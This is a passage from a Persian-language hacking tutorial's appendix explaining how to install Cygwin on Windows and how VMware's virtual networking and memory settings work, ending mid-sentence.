‫ﺿﻤﻴﻤﻪ ﭘﻨﺠﻢ ؛ ﺣﻞ ﻣﺸﮑﻞ اﺟﺮای ﺑﺮﻧﺎﻣﻪ هﺎی ﺕﺤﺖ ﻟﻴﻨﻮﮐﺲ در وﻳﻨﺪوز !!‬ ‫ﺕﻮﺻﻴﻪ ﻣﻮﮐﺪ ﻣﻦ ﺏﻪ ﺷﻤﺎ اﺱﺘﻔﺎدﻩ از ‪ Cygwin‬ﺏﺎ ﺕﻤﺎم ‪ Package‬هﺎی ﺁن اﺱﺖ‪.‬‬ ‫ﺧﻮب ﺏﺮای ایﻦ ﮐﺎر راﻩ ﺡﻞ هﺎی ﺏﺴﻴﺎری وﺟﺪ دارد ﮐﻪ اﻟﺒﺘﻪ اﮐﺜﺮ دوﺱﺘﺎن ﻧﻴﺰ ﺏﺎ ﺁن ﻧﺎ ﺁﺷﻨﺎ هﺴﺘﻨﺪ‪ .‬ﮐﻼ ﺏﺮای اﻧﺠﺎم ایﻦ ﮐﺎر از دو راﻩ ﮐﻠﯽ اﺱﺘﻔﺎدﻩ‬ ‫ﻣﻴﺸﻮد ؛ راﻩ اول ﻧﺼﺐ یﮏ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻣﺠﺎزی درون ویﻨﺪوز ؛ راﻩ دوم ﺷﺒﻴﻪ ﺱﺎزی یﮏ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻣﺠﺎزی درون ویﻨﺪوز‪.‬‬ ‫راﻩ ﺡﻞ دوم ﺏﺎزدهﯽ ﺏﻴﺸﺘﺮ و اﻟﺒﺘﻪ ﮐﺎرای ﺏﻴﺸﺘﺮ وﻟﯽ دﻧﮓ ﻓﻨﮓ زیﺎد ) ﻓﻘﻂ در ﻣﻮﻗﻊ ﻧﺼﺐ ( را دارا اﺱﺖ ﻣﻦ از ایﻦ ﻧﻤﻮﻧﻪ ﻓﻘﻂ ﺏﻪ ﺕﻮﺽﻴﺢ‬ ‫ﺏﺮﻧﺎﻣﻪ ‪ Cygwin‬ﺏﺴﻨﺪﻩ ﻣﻴﮑﻨﻢ‪ .‬راﻩ ﺡﻞ اول ﺷﻤﺎ واﻗﻌًﺎ ﺏﺎیﺪ یﮏ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻣﺠﺎزی را درون ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ اﺻﻠﯽ ﺧﻮد ﻧﺼﺐ ﮐﻨﻴﺪ ﮐﻪ ﺏﺮای ایﻦ‬ ‫ﮐﺎر ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﺘﻌﺪدی ) ﺏﻴﺶ از ‪ ۵‬ﺏﺮﻧﺎﻣﻪ( وﺟﺪ دارد ﮐﻪ از ایﻦ دﺱﺖ ﻣﻦ دو ﺏﺮﻧﺎﻣﻪ ﻣﻌﺮوف ‪ VM WARE‬و ‪ Microsoft virtual pc‬و‬ ‫‪ Connectix Virtual pc‬را ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ‪ ) .‬دو ﺏﺮﻧﺎﻣﻪ ﺁﺧﺮی یﮏ ﺏﺮﻧﺎﻣﻪ ﺏﺎ دو ﻧﺎم ﻣﺘﻔﺎوت اﺱﺖ(‪.‬‬ ‫اول ﺏﺮﻧﺎﻣﻪ ‪ Cygwin‬را ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ) ﮐﻪ ﻋﺎﺷﻖ ﺁن ﺷﺪم و زﻧﺪﮔﯽ ﺏﺪون ﺁن ﺏﺮایﻢ اﻣﮑﺎن ﭘﺬیﺮ ﻧﻴﺴﺖ اﺻﻼ ( ﭼﻮن ﻓﻮق اﻟﻌﺎدﻩ ﺧﻔﻦ اﺱﺖ و اﻟﺒﺘﻪ‬ ‫رایﮕﺎن هﻢ اﺱﺖ و ﮐﺪ هﺎی ﺏﺮﻧﺎﻣﻪ ﺁن هﻢ در دﺱﺖ رس ﻣﻴﺒﺎﺷﺪ‪.‬‬ ‫ﺑﺮﻧﺎﻣﻪ ﻣﺎﻓﻮق ﺧﻔﻦ ‪: Cygwin‬‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺘﻮاﻧﻢ ﺏﮕﻮیﻢ ﺱﺎل ‪ ١٩٩٧‬ﻣﻴﻼدی و ﮐﻤﯽ ﻗﺒﻞ ﺕﺮ ﻧﻮﺷﺘﻪ ﺷﺪﻩ و ﮐﻢ ﮐﻢ ﺕﻮﺱﻌﻪ یﺎﻓﺘﻪ اﺱﺖ ﺱﻴﺴﺘﻢ ﮐﺎری ﺁن ﺧﻴﻠﯽ ﺱﺎدﻩ اﺱﺖ و ﻓﻘﻂ از‬ ‫یﮏ ﻣﮑﺎﻧﻴﺰم ﻣﻨﻔﺮد ‪ Dynamic Linked Library‬یﺎ ﺏﻪ اﺧﺘﺼﺎر ‪ DLL‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ‪ .‬ﺁدم ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺏﺮﻧﺎﻣﻪ رویﺎیﯽ اﺱﺘﻔﺎدﻩ از اﺏﺰارهﺎی‬ ‫ﺕﻮﭘﯽ هﻤﭽﻮن ‪ Nessus‬و ‪ md5sum‬و ‪ strace‬و ‪ strings‬و ‪ Cheops‬و‪ ...‬ﮐﻪ ﻓﻘﻂ ﺏﺮای ﻟﻴﻨﻮﮐﺲ ﻧﻮﺷﺘﻪ اﻧﺪ را ﺏﺪون هﻴﭽﮕﻮﻧﻪ ﻣﺸﮑﻠﯽ ﺕﺤﻘﻖ‬ ‫ﻣﯽ یﺎﺏﺪ‪ ) .‬ﺕﺄﮐﻴﺪ ﻣﻴﮑﻨﻢ ﺏﺪون ﻣﺸﮑﻞ و اﻟﺒﺘﻪ ﺏﺪون دﻧﮓ ﻓﻨﮓ (‬ ‫ایﻦ اﺏﺰار ﻣﺸﮑﻞ ﺕﺮیﻦ ﻣﺮﺡﻠﻪ ﺁن ﻣﺮﺡﻠﻪ ﻧﺼﺐ ﺏﺮﻧﺎﻣﻪ اﺱﺖ و اﻟﺒﺘﻪ ﺕﻬﻴﻪ یﮏ ﻧﺴﺨﻪ ﮐﺎﻣﻞ از ﺁن دردﺱﺮ ﺧﻴﻠﯽ زیﺎد اﺱﺖ‪ .‬اﮔﺮ ﻗﺴﻂ ﺁن را داریﺪ ﮐﻪ‬ ‫ﺏﺮﻧﺎﻣﻪ را ﺏﻪ روال ﻣﻌﻤﻮل ﺧﻮدش ﻧﺼﺐ ﮐﻨﻴﺪ ﺡﺘﻤﺎ ﺏﻪ ﻓﮑﺮ ﺕﻬﻴﻪ یﮏ ﺧﻂ ‪ DSL‬ﺏﯽ اﻓﺘﺪ !!‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦٤‬‬

‫ﺕﻮﺻﻴﻪ ﻣﻦ ﭘﻴﺪا ﮐﺮدن یﮏ ﻧﺴﺨﻪ ﮐﺎﻣﻞ از ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻌﻼوﻩ ﺕﻤﺎم اﻣﮑﺎﻧﺎت ﺟﺎﻧﺒﯽ ﺁن اﺱﺖ یﺎ ﺡﺪاﻗﻞ اﻣﮑﺎﻧﺎت اﺱﺎﺱﯽ ﺁن ﮐﻪ ﺡﺪاﻗﻞ ‪ ١١٣‬ﻣﮕﺎﺏﺎیﺘﯽ‬ ‫ﺏﺎیﺪ ﺡﺠﻢ داﺷﺘﻪ ﺏﺎﺷﺪ‪ .‬ﮐﻪ ﺏﺮای ایﻦ ﻣﻨﻈﻮر ﻣﻴﺘﻮاﻧﻴﺪ از ﺱﺎیﺖ داﻧﺸﮕﺎﻩ " ﺏﺮﮐﻠﯽ " ‪ Berkeley‬اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﻧﺴﺨﻪ ﮐﻪ ﻣﻦ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﺁدرس ﺁن را‬ ‫در زیﺮ ﻗﺮار دادﻩ ام اﻟﺒﺘﻪ واﻗﻌًﺎ ﻣﺤﺸﺮ اﺱﺖ‪.‬‬ ‫‪http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinDevelSrc.exe‬‬ ‫اﻟﺒﺘﻪ ﻧﺴﺨﻪ هﺎی دیﮕﺮی هﻢ وﺟﺪ دارد ﮐﻪ ﺡﺠﻢ ﮐﻤﺘﺮی دارد از ﻗﺒﻴﻞ ‪:‬‬ ‫‪http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinBasic.exe‬‬ ‫ﺏﺎ ﺡﺠﻢ ‪ ١٠٫٩‬ﻣﮕﺎﺏﺎیﺖ و ﻧﺴﺨﻪ‬ ‫‪http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinDevel.exe‬‬ ‫ﺏﺎ ﺡﺠﻢ ﺕﻘﺮیﺒﯽ ‪ ٣۴٫۶‬ﻣﮕﺎﺏﺎیﺖ و ﻧﺴﺨﻪ‬ ‫‪http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinBasic.exe‬‬ ‫ﺏﺎ ﺡﺠﻢ ‪ ١١٫١‬ﻣﮕﺎﺏﺎیﺖ و ﻧﺴﺨﻪ‬ ‫‪http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinDevel.exe‬‬ ‫ﺏﺎ ﺡﺠﻢ ﺕﻘﺮیﺒﯽ ‪ ٢۵٫۴‬ﻣﮕﺎﺏﺎیﺖ ‪.‬‬ ‫ﺏﻌﺪ از دریﺎﻓﺖ هﺮ ﮐﺪام از ایﻦ هﺎ ‪ ،‬ﻣﺮاﺡﻞ زیﺮ را ﺏﻪ ﺕﺮﺕﻴﺐ اﻧﺠﺎم دهﻴﺪ‬ ‫‪ -١‬ﺁن را از ﺡﺎﻟﺖ ﻓﺸﺮدﻩ ﺧﺎرج ﮐﺮدﻩ و ﺏﺮﻧﺎﻣﻪ ﻧﺼﺐ را از داﺧﻞ ﭘﻮﺷﻪ اﺟﺮا ﮐﻨﻴﺪ ) ﻣﻌﻤﻮﻻ ﺧﻮدش ﺧﻮدﮐﺎر ﺏﺎﻻ ﻣﯽ ﺁیﺪ (‬ ‫‪ -٢‬ﺏﻌﺪ ﮔﺰیﻨﻪ ‪ Install from local directory‬را اﻧﺘﺨﺎب ﮐﺮدﻩ )ﻣﻌﻤﻮﻻ ﺧﻮدش ایﻦ را هﻢ اﻧﺘﺨﺎب ﻣﻴﮑﻨﺪ ﺏﻪ ﺻﻮرت ﭘﻴﺶ ﻓﺮض (‬ ‫‪ -٣‬ﺏﻌﺪ ‪ Root Directory‬را ﺟﺎیﯽ اﻧﺘﺨﺎب ﮐﻨﻴﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ در ﺁﻧﺠﺎ ﻗﺮار ﻣﻴﮕﻴﺮد و ) ریﺸﻪ ﺷﺮوع ﻟﺒﻪ ﮐﺎر ﺏﺮﻧﺎﻣﻪ هﻢ اﺱﺖ (‬ ‫‪ -۴‬اﮔﺮ ﻣﻴﺨﻮاهﺪ دیﮕﺮ ﮐﺎرﺏﺮان ﻣﺎﺷﻴﻦ ﺷﻤﺎ از ﺏﺮﻧﺎﻣﻪ اﺱﺘﻔﺎدﻩ ﮐﻨﻨﺪ ﮔﺰیﻨﻪ ‪ All User‬را اﻧﺘﺨﺎب ﮐﻨﻴﺪ در ﻏﻴﺮ ایﻦ ﺻﻮرت ﮔﺰیﻨﻪ ‪ Just ME‬را‬ ‫اﻧﺘﺨﺎب ﮐﻨﻴﺪ‪.‬‬ ‫‪ -۵‬ﮔﺰیﻨﻪ ‪ DOS‬و ‪ Unix‬ﻗﺎﻟﺐ ﺕﻮﻟﻴﺪ ﻓﺎیﻠﻬﺎی ﻣﺘﻦ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪ ) .‬ﻓﺮﻗﯽ ﺏﺎ هﻢ ﻧﺪارد ﺕﻮﺻﻴﻪ ‪ Unix‬اﺱﺖ(‬ ‫‪ -۶‬ﮔﺰیﻨﻪ ‪ Local Package directory‬هﻢ ﻣﺤﻞ وﺟﻮد ﻓﺎیﻞ هﺎی ‪ Package‬ﮐﻪ هﻤﺎن ﺏﺮﻧﺎﻣﻪ هﺎی ﻧﺼﺐ در ایﻦ ﺷﺒﻴﻪ ﺱﺎز اﺱﺖ را ﻣﺸﺨﺺ‬ ‫ﻣﻴﮑﻨﺪ‪.‬‬ ‫‪ -٧‬در ﻗﺴﻤﺖ ‪ Select Packages‬ﺷﻤﺎ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻣﺠﻤﻮﻋﻪ ﻓﺎیﻠﻬﺎ و ﺏﺮﻧﺎﻣﻪ هﺎیﯽ ﮐﻪ داﻧﻠﻮد ﮐﺮدﻩ ایﺪ ﻣﺠﻤﻮﻋﻪ ای از ﺏﺮﻧﺎﻣﻪ هﺎ ﺏﺮای ﻧﺼﺐ در‬ ‫اﺧﺘﻴﺎر داریﺪ ﮐﻪ ﺏﺎ ﮐﻠﻴﺪ ﮐﺮدن روی ﮔﺰیﻨﻪ ‪ View‬اﻣﮑﺎن اﻧﺘﺨﺎب هﺮ ﮐﺪام از ﺏﺮﻧﺎﻣﻪ هﺎ ﺏﺮای ﺷﻤﺎ ﻓﺮاهﻢ ﻣﻴﺸﻮد‪.‬‬ ‫‪ -٨‬ﺏﺎ زدن دﮐﻤﻪ ‪ Next‬ﺏﺮﻧﺎﻣﻪ ﺷﺮوع ﺏﻪ ﻧﺼﺐ ﺧﻮد ﻣﻴﮑﻨﺪ و در ﺁﺧﺮ ﮐﺎر هﻢ از ﺷﻤﺎ ﺏﺮای درﺱﺖ ﮐﺮدن ﻣﻴﺎن ﺏﺮ در روی ﺻﻔﺤﻪ و ﻣﻨﻮی ‪Start‬‬ ‫از ﺷﻤﺎ ﺱﻮال ﻣﻴﮑﻨﺪ ‪.‬‬ ‫‪ -٩‬ﺏﺎ ﮐﻠﻴﺪ روی ﻣﻴﺎن ﺏﺮ ﺁن ﺏﺮﻧﺎﻣﻪ ﺷﺮوع ﺏﻪ ﮐﺎر ﻣﻴﮑﻨﺪ و ﺷﻤﺎ ﮐﺎﻣﻼ یﮏ ﺧﻂ ﻓﺮﻣﺎن ﻟﻴﻨﻮﮐﺲ ) ‪ ( Shell‬واﻗﻌﯽ داریﺪ در ویﻨﺪوز ﺧﻮدﺕﺎن !!‬ ‫اﮔﺮ از ایﻦ راهﯽ ﮐﻪ ﻣﻦ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﺧﻮﺷﺘﺎن ﻧﻴﺎﻣﺪﻩ ﻣﻴﺘﻮاﻧﻴﺪ ﺧﻮد ﺏﺮﻧﺎﻣﻪ ﻧﺼﺐ را ﺏﺎ ﺡﺠﻢ ‪ ٢۵٧‬ﮐﻴﻠﻮ ﺏﻴﺖ از ﺱﺎیﺖ ‪ Cygwin.com‬دریﺎﻓﺖ‬ ‫ﮐﺮدﻩ و ﺁن را اﺟﺮا ﮐﻨﻴﺪ‪ .‬وﻟﯽ ﺡﺘﻤﺎ ﺏﻪ ایﻦ یﮑﯽ ﺕﻮﺻﻴﻪ ﻣﻦ ‪ ،‬ﮐﻪ در ﻣﺮﺡﻠﻪ دوم ﺏﻪ ﺟﺎی ﮔﺰیﻨﻪ ‪ Install from local directory‬یﺎ ﮔﺰیﻨﻪ‬ ‫‪ Install from internet‬از ﮔﺰیﻨﻪ ‪ Download Without Install‬اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﮐﻪ ﺏﺎ ایﻦ ﮐﺎر ﺷﻤﺎ ‪ Package‬هﺎ را اول داﻧﻠﻮد ﻣﻴﮑﻨﻴﺪ ﺏﻌﺪ ﺏﻪ‬ ‫ﺷﻴﻮﻩ ﮐﻪ ﺏﺎﻻ ﺕﻮﺽﻴﺢ دادم ﺏﺮﻧﺎﻣﻪ را ﻧﺼﺐ ﻣﻴﮑﻨﻴﺪ اﻟﺒﺘﻪ در ایﻦ ﺷﻴﻮﻩ ﮐﻪ ﻣﻦ اﺻﻼ ﺕﻮﺻﻴﻪ ﻧﻤﻴﮑﻨﻢ اﮔﺮ ﺧﺪای ﻧﮑﺮدﻩ اﺕﻔﺎﻗﯽ از هﺮ ﻧﻮع ﺏﯽ اﻓﺘﺪ‬ ‫اﻣﮑﺎن ﺷﺮوع دوﺏﺎرﻩ ﮐﺎر از اول اﺱﺖ و ﺷﻤﺎ هﻤﻪ ﺏﺮﻧﺎﻣﻪ هﺎیﯽ را ﮐﻪ دریﺎﻓﺖ ﮐﺮدﻩ ایﺪ از دﺱﺖ ﻣﻴﺪهﻴﺪ‪ .‬ﺏﻘﻴﻪ ﮐﺎر ﺏﻌﺪ از اﺕﻤﺎم اﻧﺘﺨﺎب ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪ‬ ‫داﻧﻠﻮد ﺁن ﻣﺜﻞ ﺷﻴﻮﻩ ﺏﺎﻻ اﺱﺖ ‪.‬‬ ‫ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ ﺷﻤﺎ ﻣﯽ ﺕﻮاﻧﻴﺪ ﺏﺮﻧﺎﻣﻪ ﻧﺼﺐ را هﺮ ﭼﻘﺪر ﺏﺨﻮاهﻴﺪ اﺟﺮا ﮐﻨﻴﺪ و ﺏﺮﻧﺎﻣﻪ داﻧﻠﻮد ﮐﻨﻴﺪ و ﺏﻌﺪ ﻧﺼﺐ ﮐﻨﻴﺪ یﺎ ﺏﺮﻧﺎﻣﻪ ﺧﺎﺻﯽ را ﺡﺬف‬ ‫ﮐﻨﻴﺪ یﺎ هﻤﻪ را ﺡﺬف ﮐﻨﻴﺪ‪.‬‬ ‫ﺧﻮب ایﻦ ﺏﺮﻧﺎﻣﻪ واﻗﻌًﺎ ﺷﺎهﮑﺎر اﺱﺖ ﭼﻮن ﺏﻌﺪ از اﺟﺮای ﺁن ﮐﻪ یﮏ ﺧﻂ ﻓﺮﻣﺎن ﺱﺎدﻩ ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ ﮐﻪ اﺟﺎزﻩ اﺟﺮای هﻤﻪ ﺏﺮﻧﺎﻣﻪ هﺎی ویﻨﺪوز و‬ ‫ﻟﻴﻨﻮﮐﺲ ﺡﺘﯽ ﮔﺮاﻓﻴﮑﯽ هﺎ را در ان ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ ﮐﻪ ایﻦ ﺷﮑﻠﯽ ‪:‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦٥‬‬

‫ﺧﻮب ﺏﻘﻴﻪ ﮐﺎرا را ﺧﻮدﺕﺎن ﻣﻴﺪاﻧﻴﺪ ﺏﻪ ﻣﻦ رﺏﻄﯽ ﻧﺪارد ﺏﺎ ایﻦ ﻣﻴﺨﻮاهﻴﺪ ﭼﻪ ﮐﺎر ﮐﻨﻴﺪ ﻓﻘﻂ ایﻦ ﺏﮕﻢ ﺕﻤﺎم دﺱﺘﻮرهﺎی ﻟﻴﻨﻮﮐﺲ و ﺕﻤﺎم دﺱﺘﻮرهﺎی‬ ‫ویﻨﺪوز ﻓﻘﻂ در ایﻦ یﮏ وﺟﺐ ﺏﺎﻻ ﻣﯽ ﺁیﺪ اﻟﺒﺘﻪ ﺁﻧﻬﺎیﯽ ﮐﻪ ﻋﺎﺷﻖ ﻣﺤﻴﻂ ‪ X-Windows‬ﻟﻴﻨﻮﮐﺲ هﺴﺘﻦ ﺏﮕﻢ ﮐﻪ ﺏﺮیﺪ ﮐﺪ هﺎی ﺁن را داﻧﻠﻮد ﮐﻨﻴﺪ ﺏﻌﺪ‬ ‫ﺏﻴﺎد ایﻦ ﺕﻮ ﻧﺼﺐ ﮐﻨﻴﺪ ﺕﺎ واﻗﻌًﺎ یﮏ ﻟﻴﻨﻮﮐﺲ داﺷﺘﻪ ﺏﺎﺷﻴﺪ ﺏﺮای ﺁﻧﻬﺎیﯽ هﻢ ﮐﻪ ﻣﺜﻞ ﻣﻦ هﺴﺘﻦ و ﺧﻂ ﻓﺮﻣﺎن را دوﺱﺖ دارن ﻓﮑﺮ ﮐﻨﻢ هﻤﻴﻦ ﺏﺲ ﺏﺎﺷﺪ‬ ‫و ﭘﻮل اﺽﺎﻓﯽ ﺏﺮای داﻧﻠﻮد ﻧﺪارﻧﺪ ﺏﺪن !!‬ ‫ﻣﻌﺮﻓﯽ ﺑﺮﻧﺎﻣﻪ ﻣﻌﺮوف ‪: VM WARE‬‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ ﭘﻮﻟﯽ اﺱﺖ ) ﭘﺲ ﻣﻦ ﺏﺎ زیﺎد ﺁن ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ !! ( ﻧﺴﺒﺖ ﺏﻪ هﻢ ﮐﺎران ﺧﻮد در ایﻦ ﺻﻨﻒ ﻣﻴﺸﻮد ﮔﻔﺖ یﮏ وﺟﺐ ﺏﺎﻻﺕﺮ اﺱﺖ از ﺏﻘﻴﻪ‬ ‫اﻟﺒﺘﻪ از ‪ Microsoft virtual pc‬ﻣﻴﺸﻮد ﮔﻔﺖ یﮏ ‪ ١٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠‬ﺱﺎل ﻧﻮری ﺏﺎﻻﺕﺮ اﺱﺖ‪.‬‬ ‫ﺁﺧﺮیﻦ ﻧﺴﺨﻪ ﺁن ﻧﺴﺨﻪ ‪ ۵‬ﺏﺎیﺪ ﺏﺎﺷﺪ ﮐﻪ ﻓﮑﺮ ﻣﻴﮑﻨﻢ ﺡﺎﻻ ) در ایﻦ زﻣﺎن ( ﻧﺴﺨﻪ ﺁﻟﻔﺎ ﺁن هﻢ ﺁﻣﺪﻩ ﺏﺎﺷﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺷﻤﺎ ﺏﻌﺪ از ﻧﺼﺐ ﺧﻮدش!!‬ ‫اﺟﺎزﻩ ﻧﺼﺐ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ویﻨﺪوز )ﺕﻤﺎم ﻧﺴﺨﻪ هﺎ( و ﻟﻴﻨﻮﮐﺲ )‪ %٩٩٫٩٩٩٩‬ﻧﺴﺨﻪ هﺎ( را ﺏﻪ ﺷﻤﺎ در درون ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺧﻮدﺕﺎن ﮐﻪ ﻣﻤﮑﻦ‬ ‫اﺱﺖ ﻟﻴﻨﻮﮐﺲ یﺎ ویﻨﺪوز ﺏﺎﺷﺪ ‪ ،‬ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻠﯽ ﮐﻪ ﺏﻪ ایﻦ ﺻﻮرت ﻧﺼﺐ ﻣﻴﮑﻨﻴﺪ واﻗﻌًﺎ در ﺷﺒﮑﻪ ﺏﻪ ﻋﻨﻮان یﮏ ﻣﺎﺷﻴﻦ ﺡﻘﻴﻘﯽ در ﺷﺒﮑﻪ ﺷﻨﺎﺧﺘﻪ ﻣﻴﺸﻮد یﮏ ﮐﻤﯽ دﻧﮓ ﻓﻨﮓ ﺁن‬ ‫ﺏﺮای ﺷﺒﮑﻪ ﮐﺮدن ﻣﺎﺷﻴﻦ ﻣﺠﺎزی ﺏﺎ ﻣﺎﺷﻴﻦ ﺡﻘﻴﻘﯽ ﺧﻮدﺕﺎن زیﺎد اﺱﺖ ﮐﻼ ﺱﻪ ﺡﺎﻟﺖ ﺏﺮای ایﻦ ﮐﺎر ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﺪ ؛ ﺡﺎﻟﺖ اول اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ‬ ‫‪ Use Bridged Networking‬اﺱﺖ ﮐﻪ یﮏ ﮐﺎرت ﺷﺒﮑﻪ ﻣﺠﺎزی ﺏﺮای ﺷﻤﺎ و ﻣﺎﺷﻴﻦ ﻣﺠﺎزی ﻧﺼﺐ ﻣﻴﮑﻨﺪ و ﺏﻘﻴﻪ ﮐﺎر هﺎی ﺷﺒﮑﻪ هﻢ ﻣﺜﻞ روال‬ ‫ﻣﻌﻤﻮل اﺱﺖ و اﻟﺒﺘﻪ در ایﻦ ﺡﺎﻟﺖ ﺏﺎیﺪ ﺷﻤﺎ ﺏﻪ ﺁن یﮏ ‪ IP‬ﺧﺎص ‪ .‬ﺡﺎﻟﺖ دوم ﮐﻪ ﺏﺮای ﻣﺎ ایﺮاﻧﯽ هﺎ ﺏﻬﺘﺮ اﺱﺖ !!! اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ ‪Use‬‬ ‫‪ Network Address Translation‬ﮐﻪ ﺏﻪ اﺧﺘﺼﺎر ‪ NAT‬ﻣﻴﮕﻮیﻨﺪ اﺱﺖ در ایﻦ ﻣﻮﻗﻊ هﺮ وﻗﺖ ﺕﻮﺱﻂ رایﺎﻧﻪ ﺡﻘﻴﻘﯽ ﺏﻪ ﺷﺒﮑﻪ وﺻﻞ ﺷﺪیﺪ‬ ‫رایﺎﻧﻪ ﻣﺠﺎزی ﺱﻌﯽ ﻣﻴﮑﻨﺪ یﮏ ﺁدرس ‪ IP‬از ‪ ISP‬ﺷﻤﺎ ﺏﮕﻴﺮد ﮐﻪ در اﮐﺜﺮ ﻣﻮاﻗﻊ ) ﺏﻴﺶ از ‪ (%٩٠‬ﻧﺎﮐﺎم ﻣﻴﻤﺎﻧﺪ و ﺷﻤﺎ هﻢ ‪ DIC‬ﻣﻴﺸﻮیﺪ ﭼﻮن‬ ‫ﻣﻌﻤﻮﻻ ‪ ISP‬هﺎ ﮐﺎرت اﺷﺘﺮاک ﺧﻮد را ﻓﻘﻂ ﺏﺮای اﺕﺼﺎل یﮏ ﮐﺎﻣﭙﻴﻮﺕﺮ ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﻴﮑﻨﻨﺪ ﻧﻪ ﭼﻨﺪ ﺕﺎ‪ ،‬ﮐﻪ اﺱﺮار در ایﻦ ﮐﺎر ﻣﻤﮑﻦ اﺱﺖ ﺏﻪ ﻗﻄﻊ‬ ‫ﺷﺪن اﺷﺘﺮاک ﺷﻤﺎ ﻧﻴﺰ ﺏﯽ اﻧﺠﺎﻣﺪ‪ .‬ﺡﺎﻟﺖ ﺱﻮم ﭘﺲ ﺏﻪ درد ﻣﺎ ﻣﻴﺨﻮرد در ایﻦ ﺷﻴﻮﻩ رایﺎﻧﻪ ﺡﻘﻴﻘﯽ ﺕﻘﺮیﺒﺎ ﻧﻘﺶ یﮏ ﺱﺮور را اﻧﺠﺎم ﻣﻴﺪهﺪ ﺏﻪ ایﻦ‬ ‫ﺻﻮرت ﮐﻪ هﻤﻪ رایﺎﻧﻪ هﺎی ﻣﺠﺎزی زیﺮ ﻣﺠﻤﻮﻋﻪ ایﻦ ﻣﺎﺷﻴﻦ ﻣﻴﺸﻮﻧﺪ و ﻣﺜﻼ اﮔﺮ درﺧﻮاﺱﺘﯽ ﺏﺮای دیﺪن یﮏ ﺻﻔﻪ وب از ﻃﺮف ﺁﻧﻬﺎ ﺏﺎﺷﺪ اول‬ ‫رایﺎﻧﻪ ﺷﻤﺎ ﺁن ﺻﻔﺤﻪ را از ‪ ISP‬ﺧﻮدﺕﺎن ﻣﻴﮕﻴﺮد ﺏﻌﺪ ﻣﻴﺪهﺪ ﺏﻪ ﺁن ﻣﺎﺷﻴﻦ ﻣﺠﺎزی ) دﻗﻴﻘﺎ ﻣﺜﻞ ‪ %٩٩‬ﮐﺎﻓﯽ ﻧﻴﺖ هﺎ(‪.‬‬ ‫ﻧﮑﺘﻪ دیﮕﺮی ﮐﻪ در ﺏﺎرﻩ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻬﻢ اﺱﺖ ﺷﻴﻮﻩ ﺕﻘﺴﻴﻢ ‪ RAM‬اﺱﺖ ﺏﺎیﺪ ﺷﻤﺎ رم ﺧﻮد را اول ﻇﺮﻓﻴﺖ ﺁن را ﺕﻘﺴﻴﻢ ﺏﺮ دو ﮐﺮدﻩ و ﻋﺪد ﺡﺎﺻﻞ‬ ‫را ﺏﻪ ﺻﻮرت ﻣﺴﺎوی ﺏﻴﻦ ﺕﻌﺪاد ‪ ،‬ﻣﺎﺷﻴﻦ هﺎی ﻣﺠﺎزی ﮐﻪ ﻗﺴﻂ داریﺪ ﺏﻪ ﻃﻮر هﻢ زﻣﺎن از ﺁﻧﻬﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺕﻘﺴﻴﻢ ﮐﻨﻴﺪ ؛ اﮔﺮ ﻗﺴﻂ اﺱﺘﻔﺎدﻩ هﻢ‬ ‫زﻣﺎن از ﺁﻧﻬﺎ را ﻧﺪاریﺪ ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺼﻒ ‪ RAM‬ﺧﻮد را ﺏﻪ ﺁن ﻣﺎﺷﻴﻦ ﻣﺠﺎزی اﺧﺘﺼﺎص دهﻴﺪ ‪.‬‬ ‫ﺁﺧﺮیﻦ ﻧﮑﺘﻪ ایﻦ 